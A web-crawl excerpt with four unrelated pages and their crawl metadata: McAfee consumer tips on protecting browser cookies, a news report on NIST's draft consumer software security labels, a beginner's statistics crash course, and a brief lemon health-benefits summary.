Also, almost every browser has the option to enable/disable cookies on your computer. So if you don’t want them at all, your browser’s support section can walk you through how to disable them. Turn off autofill features Although it’s convenient to not have to re-type your credentials into a website you frequently visit, autofill features could make it easier for a criminal to extract your data with cookie hijacking. Plus, autofill is risky if your physical device falls into the wrong hands. To browse more securely without having to constantly reenter your passwords, use a password manager like McAfee True Key. True Key makes it so you only have to remember one master password, and it encrypts the rest in a vault protected by one of the most secure encryption algorithms available. Opt into multi-factor authentication Strong, unique passwords for each of your accounts, updated regularly, offer ample protection against hackers. Multi-factor authentication (MFA) adds yet another layer of security by double-checking your identity beyond your username and password, usually with a texted or emailed code. When your accounts offer MFA, always opt in. Connect to a virtual private network (VPN) Criminals can hijack your cookies if you’re browsing on an unsecured, public Wi-Fi connection. To prevent a criminal from swiping your data, use a virtual private network (VPN), a service that protects your data and privacy online. A VPN creates an encrypted tunnel that makes you anonymous by masking your IP address while connecting to public Wi-Fi hotspots. This is a great way to shield your information from online spies while you’re banking, shopping, or handling any kind of sensitive information online. Use antivirus software McAfee LiveSafe™ is an antivirus solution that protects your computer and mobile devices from suspicious web cookies by: - Allowing you to keep your online passwords (which are often stored in cookies) in one secure location. - Warning you of suspicious links, keeping potentially harmful cookies off your device. - Protecting you against viruses and malware. - Blocking spam and emails that could lead to sites containing dangerous cookies. Follow us to stay updated on all things McAfee and on top of the latest consumer and mobile security threats.
<urn:uuid:bf01e220-ac77-464d-b375-d4f1f8b4a3cd>
CC-MAIN-2022-40
https://www.mcafee.com/blogs/privacy-identity-protection/what-are-browser-cookies-and-how-do-i-manage-them/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.37/warc/CC-MAIN-20220930212504-20221001002504-00669.warc.gz
en
0.902894
1,300
3.28125
3
The effort aims to create a user-friendly label to educate consumers about their purchases. The National Institute of Standards and Technology is looking for input on new cybersecurity guidance for consumer software in a bid to increase the public’s safety and awareness. NIST officials want feedback on labeling criteria for certain software products to ensure the general public find the labels user-friendly. “We are establishing criteria for a label that will be helpful to consumers,” Michael Ogata, a NIST computer scientist and co-author of the draft document, said in the press release. “The goal is to raise consumers’ awareness about the various security needs they might have and to help them make informed choices about the software they purchase and use.” NIST’s criteria initiative is a result of an executive order President Joe Biden signed in May following multiple widespread ransomware attacks. Pursuant to the order, NIST is required to develop new operating procedures that can be used to evaluate software security and educate consumers about the technology they purchase. The criteria will serve as the foundational technical information requirements for labeling consumer software products. Some of the information set to be included in the labels are “attestations,” which are claims about a specific software’s security features. These claims range from best practices, a description of the software systems, known vulnerabilities, and data encryption and protection statuses. “As a complement to the labeling approach, a robust consumer education program should be developed to increase label recognition and to provide transparency,” Ogata said. “Consumers should have access to online information including what the label means and does not mean, so that they can avoid potential misinterpretations.” NIST itself does not create the labels and has yet to determine which entity will. Labels won’t be a requirement on all software products; rather, the executive order stipulates the labels will be voluntary and at the discretion of the marketplace to determine which organizations should use cybersecurity labels on software products.
<urn:uuid:f65f5e2b-0029-4c22-8037-487370f1d514>
CC-MAIN-2022-40
https://www.nextgov.com/cybersecurity/2021/11/nist-seeks-feedback-cybersecurity-labels-software/186773/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.37/warc/CC-MAIN-20220930212504-20221001002504-00669.warc.gz
en
0.927822
417
2.53125
3
A crash course is like a quick recap of a course: it saves time and covers the whole syllabus in a short span in an easy manner. A crash course is a great support for students who have to cover a lot of material in a short period, and it lets them learn quickly and efficiently. This blog is a guide for anyone who wants to study statistics in a short period of time. A crash course in statistics is beginner's training in the primary methods of statistics. It will help you understand statistics better and clear up your questions. The key statistical topics include:
- Basics of probability,
- An introduction to statistical inference,
- Types of statistics,
- Nonparametric statistics
At the end of the blog, a questionnaire is provided to help readers assess their basic knowledge of statistics. For students who are new to statistics, and for anyone who needs to understand it, this "crash course" can prove very beneficial.

1. Basics of Probability

A probability is a number that indicates the chance or likelihood of a specific event occurring. Probabilities can be expressed as proportions ranging from 0 to 1, and they can likewise be expressed as percentages ranging from 0% to 100%. A probability of 0 indicates that there is no chance that a particular event will happen, whereas a probability of 1 indicates that the event is certain to happen. A probability of 0.45, or 45%, indicates that there are 45 chances out of 100 of the event happening. (Must read: Introduction to Conditional Probability)

Common Terms Under Probability

Sample Space, or S – The set of all possible elementary outcomes of a trial; the probability of the sample space is always 1. If the trial consists of flipping a coin two times, the sample space is S = {(h, h), (h, t), (t, h), (t, t)}. (Also read: Importance of Statistics and Probability in Data Science)

2. Introduction to Statistical Inference

Statistical inference is the process of using data analysis to draw conclusions about a population or process beyond the data at hand. Inferential statistical analysis infers the properties of a population by testing hypotheses and deriving estimates. For instance, you might survey a sample of people in a region and, using statistical principles including simulation and probability theory, make certain inferences based on that sample. (Also read: Statistical Data Analysis) In simple words, statistical inference is used to make statements about a population based on data from a sample.

Basic Terms Under Statistical Inference

Measurement error is sometimes called observational error. It is the difference between a measured quantity and its true value. It comprises random errors, which occur naturally and are to be expected in any experiment, and systematic errors, which are induced by, for example, a miscalibrated device that influences all measurements. (Recommended blog: Types of Statistical Analysis)

Reliability is a measure of the stability or consistency of scores. You can also think of it as the ability of a test or of research findings to be repeatable. For example, a clinical thermometer is a reliable instrument that would measure the correct temperature each time it is used. Similarly, a reliable math test will accurately measure mathematical ability for every student who takes it, and reliable research findings can be reproduced over and over again.
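To tie the probability basics above to something concrete, here is a small Python sketch (not part of the original article) that enumerates the sample space for flipping a coin twice and computes a couple of probabilities from it; note that the probability of the whole sample space comes out to 1, as stated above.

```python
from itertools import product
from fractions import Fraction

# Sample space for two flips of a fair coin: S = {(h,h), (h,t), (t,h), (t,t)}
sample_space = list(product("ht", repeat=2))
p_each = Fraction(1, len(sample_space))          # each elementary outcome is equally likely

p_sample_space = p_each * len(sample_space)      # P(S) = 1
p_at_least_one_head = p_each * sum("h" in outcome for outcome in sample_space)

print("S =", sample_space)
print("P(S) =", p_sample_space)                        # 1
print("P(at least one head) =", p_at_least_one_head)  # 3/4
```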
Obviously, it's not quite as simple as just declaring that you think a test is reliable; there are numerous tools you can use to measure reliability.

Validity is a crucial element in choosing a survey instrument. In simple words, a valid test or instrument is one that accurately measures what it's supposed to measure. In research, there are three ways to approach validity: content validity, construct validity, and criterion-related validity.

There are two types of data: numerical data and categorical data. If you are wondering where quantitative data fits in, note that numerical data is also known as quantitative data. Numerical data implies a measurement, like a person's height, weight, or IQ. It is divided into two parts: discrete and continuous.

Discrete data – Data that can be counted. The list of possible values may be fixed (finite), or it may run from 0, 1, 2, on to infinity.

Continuous data – The opposite of discrete data: its possible values cannot be counted. It can only be described using intervals on the real number line.

3. Types of Statistics

There are two types of statistics, descriptive and inferential, and here we will look at both in detail.

Descriptive statistics is a simple way to describe our data. It helps in portraying and understanding the features of a particular data set by giving short summaries of the sample and measures of the data. The most recognized types of descriptive statistics are the measures of centre: the mean, median, and mode, which are used at practically all levels of math and statistics. People use descriptive statistics to turn hard-to-grasp quantitative results from a large data set into bite-sized summaries. There are two categories under this: first, the measure of central tendency, which is used to indicate the centre point of a sample or data set; next, the measure of variability, which is used to describe the spread in a sample or population.

Inferential statistics is used to interpret the meaning of descriptive statistics. That is, once the data has been collected, analyzed, and summarized, we use these details to describe the significance of the gathered data. There are several types of inferential statistics that are used widely and are easy to interpret. Inferential statistics lets you make predictions from a small sample rather than working on the whole population—for example, the one-sample test of difference/one-sample hypothesis test, contingency tables and the chi-square statistic, the t-test, and so on. (Recommended blog: Introduction to Bayesian Statistics)

4. What is a T-Test?

Here, we will look in detail at the t-test, which is a type of inferential statistics. The t-test is used to decide whether there is a significant difference between the means of two groups, which may be related in certain features. To determine statistical significance, a t-test looks at the t-statistic, the t-distribution values, and the degrees of freedom; to conduct a test with three or more means, one should use an analysis of variance. The t-test is generally used when the data set—like the data set recorded as the result of flipping a coin 100 times—would follow a normal distribution and may have unknown variances.
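Before going deeper into the t-test, here is a brief sketch of the ideas in sections 3 and 4, using made-up numbers (the two groups below are invented for illustration, and SciPy is assumed to be installed): the first few lines compute descriptive measures of centre and variability, and the last lines run an independent two-sample t-test, the inferential step.

```python
import statistics
from scipy import stats  # assumed installed

group_a = [12.1, 11.8, 12.4, 12.0, 12.3, 11.9]   # invented sample data
group_b = [11.2, 11.5, 11.1, 11.6, 11.4, 11.3]

# Descriptive statistics: measures of centre and variability
print("mean  :", statistics.mean(group_a))
print("median:", statistics.median(group_a))
print("stdev :", statistics.stdev(group_a))       # sample standard deviation

# Inferential statistics: is the difference between the two group means significant?
t_stat, p_value = stats.ttest_ind(group_a, group_b)
print(f"t = {t_stat:.2f}, p = {p_value:.4f}")
```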
A t-test is used as a hypothesis testing tool, which permits testing of an assumption about a population. Calculating a t-test requires three key data values: the difference between the mean values of the two data sets (sometimes called the mean difference), the standard deviation of each group, and the number of data values in each group. Various types of t-test can be conducted depending on the data and the type of analysis needed. (Related blog: T-test vs Z-test)

The main assumption made with respect to t-tests concerns the scale of measurement: the scale applied to the data collected should be continuous or ordinal, for example the scores on an IQ test. A further assumption is that the data, when plotted, produce a normal, bell-shaped distribution curve.

5. What are Nonparametric Statistics?

Nonparametric statistics refers to statistical methods in which the data are not assumed to come from prescribed models determined by a small number of parameters; examples of such models include the normal distribution model and the linear regression model. Nonparametric statistics sometimes uses data that are ordinal, meaning it relies not on the numbers themselves but on their ranking or order. This kind of analysis is often best suited to situations where the order of the observations is what matters, so the conclusions hold even if the underlying numerical values change. (Also read: What is Econometrics?)

Nonparametric descriptive statistics, statistical models, inference, and statistical tests all come under nonparametric statistics. The model structure of nonparametric models is not specified a priori but is instead determined from the data. The term nonparametric is not meant to imply that such models lack parameters; rather, the number and nature of the parameters are flexible and not fixed in advance. Thus, a histogram is an example of a nonparametric estimate of a probability distribution. (Recommended blog: Statistical Data Analysis Techniques)

For more clarity, consider an example: suppose a financial analyst wishes to estimate the value at risk (VaR) of an investment. The analyst gathers return data from hundreds of comparable investments over a similar time horizon. Instead of assuming that the returns follow a normal distribution, the analyst uses a histogram to estimate the distribution nonparametrically. The fifth percentile of this histogram then gives the analyst a nonparametric estimate of VaR.

Questionnaire: Analyze Yourself
- What is probability in statistics?
- What is reliability?
- How do you calculate the mean, median, and mode?
- Describe the types of data.
- What is descriptive statistics?
- Write five assumptions of the t-test.
- Explain nonparametric statistics with examples.
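As a worked illustration for the last questionnaire item, the analyst example from section 5 translates almost directly into code. The sketch below uses made-up return data (drawn from a random generator purely to have numbers to work with — the method itself assumes nothing about the distribution) and takes the empirical fifth percentile as the nonparametric VaR estimate.

```python
import numpy as np

rng = np.random.default_rng(seed=42)
# Stand-in for observed returns from ~100 comparable investments (fabricated for illustration)
returns = rng.normal(loc=0.05, scale=0.12, size=100)

# Nonparametric estimate of the distribution: a histogram of the observed data
counts, bin_edges = np.histogram(returns, bins=10)

# Nonparametric VaR: the empirical 5th percentile, with no distributional assumption
var_5 = np.percentile(returns, 5)
print(f"5th percentile (nonparametric VaR estimate): {var_5:.3f}")
```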
<urn:uuid:ef3b4832-43a4-4aae-bc1c-fe409966f17a>
CC-MAIN-2022-40
https://www.analyticssteps.com/blogs/crash-course-statistics
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337421.33/warc/CC-MAIN-20221003133425-20221003163425-00669.warc.gz
en
0.922296
2,050
3.671875
4
Lemon Health Benefits and Uses gives you tips on the vitamins in lemon and on maintaining good health. One lemon provides about 31 mg of vitamin C, which is 51% of the recommended daily intake. Plant chemicals found in lemons, namely hesperidin and diosmin, can lower cholesterol. Just half a cup (4 oz) of lemon juice per day can provide enough citric acid to help prevent stone formation, and some studies have found that lemonade effectively prevented kidney stones. In rodent studies, plant compounds from lemons prevented malignant tumors from developing in the tongue, lungs, and colon, and D-limonene, an anti-cancer compound, is found in lemon oil. Lemons contain both vitamin C and citric acid, so they may protect against anemia by ensuring you absorb as much iron as possible from your diet. To get the health benefits of fiber from lemons, you need to eat a lot of them, including their pulp and skin.
<urn:uuid:583c5756-b3a0-40f5-8f6f-a7e55f339123>
CC-MAIN-2022-40
https://areflect.com/2018/02/06/lemon-health-benefits-and-uses/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337529.69/warc/CC-MAIN-20221004215917-20221005005917-00669.warc.gz
en
0.933264
196
2.640625
3